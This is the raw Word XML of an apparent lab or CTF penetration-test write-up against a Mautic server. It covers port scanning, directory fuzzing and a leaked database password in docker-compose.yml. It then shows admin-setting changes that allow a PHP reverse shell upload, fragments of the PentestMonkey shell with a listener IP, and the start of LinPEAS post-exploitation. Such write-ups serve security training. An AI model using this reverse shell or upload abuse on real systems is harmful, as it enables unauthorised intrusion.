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3rr4cp9xxs6h"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89i7wdia4r6j"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Mautic</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6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gx44mrpjgx4k" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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begin this project with the reconnaissance phase, collecting information about the target environment. We will perform port enumeration to identify active services exposed on the target system.</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~/tools/enumport/script.sh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172.16.2.98</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Enumerando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portas....</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Portas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abertas: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22,8000</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Verificando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Serviços</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7.94SVN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https://nmap.org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2025-06-20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14:33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172.16.2.98</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latency).</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22/tcp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9.6p1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Ubuntu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3ubuntu13.11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(Ubuntu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Linux;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ssh-hostkey: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58:81:e7:97:d2:5f:79:04:72:bf:d1:46:ff:fa:37:1d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(ECDSA)</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a2:f0:1e:33:33:a0:57:b8:a0:f6:cb:dd:cc:80:40:3c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(ED25519)</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8000/tcp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Apache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2.4.38</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http-robots.txt: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disallowed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entries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/plugins/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/media/dashboards/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/media/files/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/media/js/mautic-form-src.js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|_/vendor/</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|_http-open-proxy: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Proxy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requests</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|_http-server-header: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Apache/2.4.38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(Debian)</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|_Requested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http://172.16.2.98:8000/index.php/s/login</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172.18.0.3;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Linux;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cpe:/o:linux:linux_kernel</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Please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https://nmap.org/submit/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43.74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seconds</w:t>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For port and service enumeration, we used a custom script along with Nmap:</w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/fstringuetta/enumport</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.k613unbfps9z" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hosts File Configuration</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simplify name resolution, we added the domain directly to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file.</w:t>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'172.16.2.98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/etc/hosts</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172.16.2.98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mautic.hc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.x2vqbspqpqus" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Enumeration – Port 8000</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soon as we access the HTTP service running on port 8000, we are presented with the following screen.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5853113" cy="2926556"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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53113" cy="292655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proceed with enumeration in search of files and directories that may potentially be hidden.</w:t>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ffuf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/usr/share/seclists/Discovery/Web-Content/quickhits.txt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http://mautic.hc:8000/FUZZ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v2.1.0-dev</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________________________________________________</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http://mautic.hc:8000/FUZZ</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FUZZ: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/usr/share/seclists/Discovery/Web-Content/quickhits.txt</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200-299,301,302,307,401,403,405,500</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________________________________________________</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docker-compose.yml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148ms]</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LICENSE.txt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38407,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6399,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770,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152ms]</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upgrade.php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151ms]</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identified the existence of two files: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose.yml</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upgrade.php.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We downloaded both files to our host.</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http://mautic.hc:8000/docker-compose.yml</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--2025-06-20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14:47:14--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http://mautic.hc:8000/docker-compose.yml</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Resolving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172.16.2.98</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Connecting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(mautic.hc)|172.16.2.98|:8000...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connected.</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430</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‘docker-compose.yml’</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docker-compose.yml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2025-06-20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14:47:15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(64,9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‘docker-compose.yml’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[430/430]</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http://mautic.hc:8000/upgrade.php</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--2025-06-20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14:47:21--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http://mautic.hc:8000/upgrade.php</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Resolving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172.16.2.98</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Connecting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(mautic.hc)|172.16.2.98|:8000...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connected.</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[text/html]</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‘upgrade.php’</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upgrade.php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2025-06-20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14:47:22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‘upgrade.php’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[705/705]</w:t>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both files and analyzing them, we identified that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.yml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file contains possible credentials in plaintext.</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'3.8'</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ports:</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"8000:80"</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volumes:</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./mautic_data:/var/www/html</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depends_on:</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mariadb:10.4</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always</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environment:</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MYSQL_ROOT_PASSWORD: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MYSQL_DATABASE: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MYSQL_USER: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MYSQL_PASSWORD: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cUy1RjfCvF4yOJaln</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volumes:</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./db_data:/var/lib/mysql</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volumes:</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mautic_data:</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db_data:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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During the analysis phase, research was conducted regarding known vulnerabilities in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mautic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">application. We identified the existence of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-47051, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which allows authenticated Remote Code Execution (RCE).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5u4qjead6arm" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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 credentials obtained from accessible files, we successfully authenticated to the application and gained access to the administrative dashboard. This access enabled the exploitation of the previously mentioned vulnerability, significantly increasing the impact of the compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5786438" cy="2809761"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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86438" cy="280976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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although a cataloged vulnerability exists for the application, no viable public exploit was identified for direct exploitation. However, since administrative access was obtained with elevated privileges, it was possible to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">modify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sensitive application settings, such as:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Modifying the list of allowed file upload extensions, enabling the upload of potentially malicious files;</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Changing the file storage path, facilitating remote access to the uploaded payload.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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scenario demonstrates how simple administrative access to the application may be sufficient to compromise the infrastructure, even without directly exploiting known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5892233" cy="1775224"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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92233" cy="177522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making the necessary changes to the Mautic application configuration — including allowing the malicious file extension and modifying the storage path — we proceed to register a new Component (Asset), a legitimate feature of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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843588" cy="2032145"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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43588" cy="203214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spacing w:after="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To receive our reverse connection, we use the PHP script from the PentestMonkey project.</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set_time_limit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'10.0.15.12';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$chunk_size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1400;</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$write_a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$error_a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/bin/sh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$daemon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$debug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Reference link:</w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://pentestmonkey.net/tools/web-shells/php-reverse-shell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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uploading the malicious file through the application, it is necessary to identify the new name automatically assigned by Mautic. To do so, simply access the “Details” option of the asset, where the final filename and file path are displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5841369" cy="3070463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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841369" cy="30704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file storage path was previously modified, we can directly access it using the configured address, as identified in the asset’s “Details” option.</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843588" cy="1872945"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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843588" cy="187294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Note: Reverse connection received through the</w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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Immediately after obtaining reverse access to the environment with an interactive shell established, we identified the first piece of evidence located directly at the root of the filesystem </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A6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5843588" cy="1245508"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2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843588" cy="124550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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8e80c6m2iper" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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continue the post-exploitation process, we transfer the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPEAS </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
